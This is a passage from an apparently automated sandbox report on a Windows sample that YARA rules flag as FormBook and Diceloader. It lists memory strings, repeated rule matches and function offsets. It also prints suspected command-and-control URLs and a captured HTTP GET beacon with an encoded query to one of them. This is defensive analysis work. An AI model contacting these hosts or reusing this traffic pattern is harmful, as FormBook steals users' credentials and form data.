          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theredorchard.co.ukReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zijlont.xyz
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zijlont.xyz/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zijlont.xyz/ne28/www.adornmentwithadrienne.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zijlont.xyzReferer:
          Source: colorcpl.exe, 0000000D.00000002.531041015.000000000505F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg
          Source: unknownDNS traffic detected: queries for: www.adornmentwithadrienne.com
          Source: global trafficHTTP traffic detected: GET /ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj HTTP/1.1Host: www.adornmentwithadrienne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: ClbrTLBbVA.exe, 00000000.00000002.297081242.00000000008D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.345666736.00000000011BF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ClbrTLBbVA.exe PID: 5252, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ClbrTLBbVA.exe PID: 7108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 4764, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: ClbrTLBbVA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.345666736.00000000011BF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: ClbrTLBbVA.exe PID: 5252, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ClbrTLBbVA.exe PID: 7108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 4764, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 0_2_00C2C1480_2_00C2C148
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 0_2_00C2A7580_2_00C2A758
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0040103011_2_00401030
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00402D8811_2_00402D88
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00402D9011_2_00402D90
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041E64311_2_0041E643
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00409E6011_2_00409E60
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D7C411_2_0041D7C4
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00402FB011_2_00402FB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C412011_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AF90011_2_016AF900
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0176100211_2_01761002
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BB09011_2_016BB090
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DEBB011_2_016DEBB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01771D5511_2_01771D55
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A0D2011_2_016A0D20
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BD5E011_2_016BD5E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B841F11_2_016B841F
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C6E3011_2_016C6E30
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: String function: 016AB150 appears 32 times
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A360 NtCreateFile,11_2_0041A360
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A410 NtReadFile,11_2_0041A410
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A490 NtClose,11_2_0041A490
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A540 NtAllocateVirtualMemory,11_2_0041A540
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A35A NtCreateFile,11_2_0041A35A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A40A NtReadFile,11_2_0041A40A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041A48B NtClose,11_2_0041A48B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_016E9910
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E99A0 NtCreateSection,LdrInitializeThunk,11_2_016E99A0
